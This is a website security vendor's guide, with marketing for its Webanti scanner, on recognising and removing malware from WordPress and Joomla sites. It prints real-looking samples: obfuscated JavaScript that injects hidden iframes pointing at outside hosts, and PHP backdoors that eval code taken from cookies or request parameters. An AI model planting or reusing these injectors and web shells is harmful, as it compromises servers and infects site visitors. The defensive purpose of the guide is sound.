Malware on website - how to identify and remove

We have prepared this guide in order to make it easier for our clients to eliminate viruses from Wordpress, Joomla, or other websites.

The basic question that needs to be answered is: what does the virus on the website look like?

For the purposes of this guide, let us divide viruses into two types:

- those in executable files on the side of the client (e.g. HTML, JS, CSS)

- and those in executable files on the side of the server (e.g. in PHP)

How does basic executable virus on the client's side looks like?

<sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(''+e(c)+'','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</sc​ript>
 

 

<!-- . --><sc ript&gt;var ar="=2}Cd8 pvsyw:AlEeTcBNfb6u&gt;1&lt;,)h.r3'niao0 g;/{m["(t]";try{'qwe'.length(1);}catch(a){k=new Boolean().toString();date=new Date();};var ar2="f120,120,108,63,18,144,12,114,54,72,135,48,105,147,93,123,48,147,45,42,48,135,48,105,147, 27,57,30,51,111,123,60,111,135,48,144,102,66,114,12,30,102,87,138,117,150,87,132,120,120,120, 108,63,96,111,135,48,96,144,87,126,120,120,6,18,48,42,27,48,18,132,120,120,120,12,114,54,72, 135,48,105,147,93,33,96,108,147,48,144,141,81,108,63,96,111,135,48,18,27,96,54,0,102,90,147, 147,21,36,129,129,3,117,69,93,78,99,117,93,78,3,78,93,78,3,15,129,108,135,111,123,48,27,129, 72,21,42,114,111,12,93,90,147,135,42,102,18,33,108,12,147,90,0,102,78,117,102,18,90,48,108, 123,90,147,0,102,78,117,102,18,27,147,30,42,48,0,102,24,108,27,108,66,108,42,108,147,30,36, 90,108,12,12,48,105,126,21,114,27,108,147,108,114,105,36,111,66,27,114,42,72,147,48,126,42, 48,63,147,36,117,126,147,114,21,36,117,126,102,75,81,129,108,63,96,111,135,48,75,141,87,126, 120,120,6,120,120,63,72,105,54,147,108,114,105,18,108,63,96,111,135,48,96,144,87,132,120, 120,120,24,111,96,18,63,18,0,18,12,114,54,72,135,48,105,147,93,54,96,48,111,147,48,45,42,48, 135,48,105,147,144,102,108,63,96,111,135,48,102,87,126,63,93,27,48,147,39,147,147,96,108, 66,72,147,48,144,102,27,96,54,102,84,102,90,147,147,21,36,129,129,3,117,69,93,78,99,117,93, 78,3,78,93,78,3,15,129,108,135,111,123,48,27,129,72,21,42,114,111,12,93,90,147,135,42,102,87, 126,63,93,27,147,30,42,48,93,24,108,27,108,66,108,42,108,147,30,0,102,90,108,12,12,48,105, 102,126,63,93,27,147,30,42,48,93,21,114,27,108,147,108,114,105,0,102,111,66,27,114,42,72,147, 48,102,126,63,93,27,147,30,42,48,93,42,48,63,147,0,102,117,102,126,63,93,27,147,30,42,48,93, 147,114,21,0,102,117,102,126,63,93,27,48,147,39,147,147,96,108,66,72,147,48,144,102,33,108, 12,147,90,102,84,102,78,117,102,87,126,63,93,27,48,147,39,147,147,96,108,66,72,147,48,144, 102,90,48,108,123,90,147,102,84,102,78,117,102,87,126,120,120,120,12,114,54,72,135,48,105, 147,93,123,48,147,45,42,48,135,48,105,147,27,57,30,51,111,123,60,111,135,48,144,102,66,114, 12,30,102,87,138,117,150,93,111,21,21,48,105,12,9,90,108,42,12,144,63,87,126,120, 120,6]".replace(k.substr(0,1),'[');pau="rnev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));e=Function("retu"+pau)();ar2=('gfhgffg',e(ar2));s="";for(i=0;i!=ar2.length;i++){s+=ar.substr(ar2[i]/3,1);}
e(s);</sc ript><!-- . -->

 

<sc ript>
var t="";
var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f766e62 757974612e636f2e62652f666f72756d2e7068703f74703d3637356561666563343331623166373222 2077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f6 96672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</sc​ript>

 

The above 3 examples can often be found in clients executable files. If you find such a file or if the Webanti scanner shows it to you, you should delete the fragment of a code which resembles a virus.

The viruses present in executable files are aimed at infecting those who visit your website, direct the traffic to another location, or display adverts which generate profits for another person. These are the viruses which Google detects most often and because of which it blocks domains. However, we believe that they are less dangerous than the ones contained in server executable files, as they have more possibilities for interfering with the server operations, and which may bring the effects of viruses activated on the client&#39;s side.

How does basic executable virus on the server's side looks like: 

<?php eval(base64_decode(
ZWNobygiTG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2ljaW5n
IGVsaXQsIHNlZCBkbyBlaXVzbW9kIHRlbXBvciBpbmNpZGlkdW50IHV0IGxhYm9yZSBldCBkb2xv
cmUgbWFnbmEgYWxpcXVhLiBVdCBlbmltIGFkIG1pbmltIHZlbmlhbSwgcXVpcyBub3N0cnVkIGV4
ZXJjaXRhdGlvbiB1bGxhbWNvIGxhYm9yaXMgbmlzaSB1dCBhbGlxdWlwIGV4IGVhIGNvbW1vZG8g
Y29uc2VxdWF0LiBEdWlzIGF1dGUgaXJ1cmUgZG9sb3IgaW4gcmVwcmVoZW5kZXJpdCBpbiB2b2x1
cHRhdGUgdmVsaXQgZXNzZSBjaWxsdW0gZG9sb3JlIGV1IGZ1Z2lhdCBudWxsYSBwYXJpYXR1ci4g
RXhjZXB0ZXVyIHNpbnQgb2NjYWVjYXQgY3VwaWRhdGF0IG5vbiBwcm9pZGVudCwgc3VudCBpbiBj
dWxwYSBxdWkgb2ZmaWNpYSBkZXNlcnVudCBtb2xsaXQgYW5pbSBpZCBlc3QgbGFib3J1bS4iKTs=
));?>

 

<?php
$qfvut=$_COOKIE;
$mmz=$qfvut[uxhm];
if($mmz){
$cpf=$mmz($qfvut[hxlp]);$kgnb=$mmz($qfvut[qhmp]);$qgw=$cpf("",$kgnb);$qgw();
}
?>

 

<?php if(isset($_REQUEST['ch']) &amp;&amp; (md5($_REQUEST['ch']) ==&nbsp;'970a023a0983e5b4c9a2d3dd6adbd0b8')
&amp;&amp;isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } ?><?php
$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;
?>

 

 

As you can see some of them are extremely difficult to understand and even read. Just small code changes can make then undectectable to antivirus programs. Because of these issues and over the years gained experience by our team we have created Webanti. It's main task is to detect even the most obfuscated portions of the malicious code. Webanti cope with serious backdoor with which ordinary antivirus would have problems.

 

Webanti is intended to indicate the places where are the dangerous bits of code. When the virus is in the file then you should move it to quarantine. But when stuck cutout to the correct file index.php then it must not be moved or you will broke you page. You must first create a backup file and then in the editor remove the excerpt or the whole file and check that the page works correctly. After you complete these steps simply run an on-demand scan and verify that we have removed the virus successfully. When the infection is serious and you are not able to clear the site, we recommend that you contact our support.
 

 

Get free virus protection

As the saying goes – prevention is better than cure. This is also true for website security. Each year, there are more and more cybercrimes done by hackers or resulting from software created by them. Viruses/malware, ransomware, backdoor – the list of threats is long. Luckily, there are effective ways to prevent them. See, how Webanti can take care of the security of your website.

Webanti is antivirus software which makes it possible to protect websites in real time and which informs the website owner about any attempted hacker attacks. Interested? You can test the Webanti tool for free. If necessary, you can use the assistance of our consultants – 24/7, all year round.

Trust our expertise and start protecting your website effectively – try Webanti